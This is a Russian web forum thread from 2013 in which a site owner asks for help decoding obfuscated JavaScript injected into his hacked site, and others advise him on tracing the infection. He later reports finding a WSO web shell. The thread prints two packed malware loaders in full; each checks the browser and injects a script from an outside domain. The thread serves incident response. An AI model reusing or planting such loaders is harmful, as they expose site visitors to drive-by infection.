Взломали сайт. Помогите раскодировать javascript-вставку

Тема в разделе "JavaScript", создана пользователем Nei, 14 ноя 2013.

Статус темы:
Закрыта.
Модераторы: ZiX
  1. Nei

    Nei Nosce te ipsum

    Регистр.:
    5 сен 2009
    Сообщения:
    600
    Симпатии:
    468
    Приветствую.

    Взломали сайт и периодически дописывают инклуд следующего javascript-кода:
    Код:
    eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!\'\'.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return\'\\\\w+\'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp(\'\\\\b\'+e(c)+\'\\\\b\',\'g\'),k[c])}}return p}(\'8 e(6){b(5.g&&5.d){2 9=5.d(\\\'m\\\')[0];2 4=5.g(\\\'i\\\');4.7(\\\'j\\\',\\\'k/l\\\');4.7(\\\'6\\\',6);9.r(4)}}8 a(){2 3=c.t.n();2 f=\"v://w.u.3/s\";b((3.h(\"o\")==-1&&3.h(\"p\")!=-1)&&c.q()){e(f)}}a();\',33,33,\'||var|ua|script_tag|document|src|setAttribute|function|head_tag|includeCounter|if|navigator|getElementsByTagName|includeJavascript|url|createElement|indexOf|script|type|text|javascript|head|toLowerCase|chrome|win|javaEnabled|appendChild|0c2e3c75b783a83dade05c7ba4f531a1|userAgent|pp|http|lakaty\'.split(\'|\'),0,{}))
    Помогите плз расшифровать этот код и понять какие именно зловредные действия производятся.
    Пробовал различные онлайн-раскодировщики (к примеру http://alexvaleev.ru/javascript-optimizator/, http://www.strictly-software.com/unpacker#unpacker и http://jsbeautifier.org/), результата нет к сожалению.
    Замена eval на alert (как тут описано http://vijayakumar.org/web-development/simple-javascript-eval-function-encoder-decoder-beautifier/) тоже не помогает. Похоже, что ошибка в коде.

    Вот еще одна модификация кода (несколько отличается от предыдущей)
    HTML:
    eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!\'\'.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return\'\\\\w+\'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp(\'\\\\b\'+e(c)+\'\\\\b\',\'g\'),k[c])}}return p}(\'7 e(6){a(3.c&&3.d){5 8=3.d(\\\'j\\\')[0];5 2=3.c(\\\'k\\\');2.b(\\\'i\\\',\\\'l/m\\\');2.b(\\\'6\\\',6);8.s(2)}}7 h(){5 4=9.n.u();5 g=\"w://x.v.4/t.o\";a((4.f(\"p\")==-1&&4.f(\"r\")!=-1)&&9.q()){e(g)}}h();\',34,34,\'||script_tag|document|ua|var|src|function|head_tag|navigator|if|setAttribute|createElement|getElementsByTagName|includeJavascript|indexOf|url|includeCounter|type|head|script|text|javascript|userAgent|js|chrome|javaEnabled|win|appendChild|counter|toLowerCase|pp|http|dexedok\'.split(\'|\'),0,{}))
    Заранее спасибо за помощь.
     
    Последнее редактирование: 14 ноя 2013
  2. bat

    bat

    Регистр.:
    24 сен 2009
    Сообщения:
    974
    Симпатии:
    276
    слив трафа на зараженный сайт вот и все
     
    Nei нравится это.
  3. Nei

    Nei Nosce te ipsum

    Регистр.:
    5 сен 2009
    Сообщения:
    600
    Симпатии:
    468
    Если действительно слив трафа, то куда?
    Вообще редиректов никаких не заметил. С разных браузеров пробовал и с ПС переходил на сайт.
    Разве что для мобильных редирект. Это не тестировал.
     
    Последнее редактирование: 14 ноя 2013
  4. bat

    bat

    Регистр.:
    24 сен 2009
    Сообщения:
    974
    Симпатии:
    276
    ищи обфусцированный код, он скорее всего у тебя где-то в файлах сидит (скорее всего *.js)
    он бывает иногда в конце кода, либо в самом начале до <?php, или вообще привязан в <div и разбросан по страницам шаблона... вариантов масса, просто он без этой строки не запустится, но работе сайта все-равно мешает
    ты мог просто не успеть заметить например из-за скорости инета, или сайт куда идет траф может уже не существует либо заблокирован по абузе, скрипт может срабатывать для разных устройств, например только на андроиде и т.д.
     
    Nei нравится это.
  5. Nei

    Nei Nosce te ipsum

    Регистр.:
    5 сен 2009
    Сообщения:
    600
    Симпатии:
    468
    Ну, так я вроде в первом посте и привел примеры этого обфусцированного кода.

    Скриптом ai-bolit прошелся по сайту - ничего.
    Сделал локальную копию всего сайта и прошелся Авирой - тоже пусто.
    Бегло пробежался - сравнил размер .php файлов с оригинальной копией на моём компе - не нашел различий.

    Уличная магия какая-то :/

    Логи по домену на сервере тоже просмотрел - вроде ничего особо странного. Хотя их там довольно много всё внимательно просматривать устану) Хотя наверное придется (наряду с полным сравнением с оригиналом всех php-файлов сайта), если не придумаю еще как найти дыру, через которую лезут.
     
  6. bat

    bat

    Регистр.:
    24 сен 2009
    Сообщения:
    974
    Симпатии:
    276
    Не-не-не!!! Там еще должен быть кусок, а в старт-посте только начальный
    Дык что один, что другой - ***но, не удивительно что не нашел ничего :D
    Это надо индивидуально смотреть, пиши если что СЮДЫ, может и за отзыв посмотрю ;)
     
    Последнее редактирование: 14 ноя 2013
    Nei нравится это.
  7. Nei

    Nei Nosce te ipsum

    Регистр.:
    5 сен 2009
    Сообщения:
    600
    Симпатии:
    468
    Ок. Спасибо за наводку. Поищу вторую часть кода.
    Вообще дело принципа самому побороть зловреда) Но если уж совсем опустятся руки - обращусь, благодарю за предложение.


    UPD
    Нашел web-shell WSO 2.5 в одном из php-файлов
     
    Последнее редактирование: 14 ноя 2013
  8. esche

    esche

    Регистр.:
    9 авг 2009
    Сообщения:
    360
    Симпатии:
    243
    Неужели, ai-bolit его не заметил?
    Если действительно не определяет - найди время, отпиши автору..
     
  9. Nei

    Nei Nosce te ipsum

    Регистр.:
    5 сен 2009
    Сообщения:
    600
    Симпатии:
    468
    Шелл как-то по-хитрому закодирован был. Наверное поэтому.
    После раскодировки и обращения к нему через браузер начали ругаться антивирусы.
     
  10. KiЯilL

    KiЯilL Создатель

    Регистр.:
    26 ноя 2013
    Сообщения:
    32
    Симпатии:
    14
    А вот еще вопросик, статистический:
    что за движок у тебя?
    тебя прошелили? или стандартная уязвимость?
    Благодарю за ответ , заренее ;)
     
Статус темы:
Закрыта.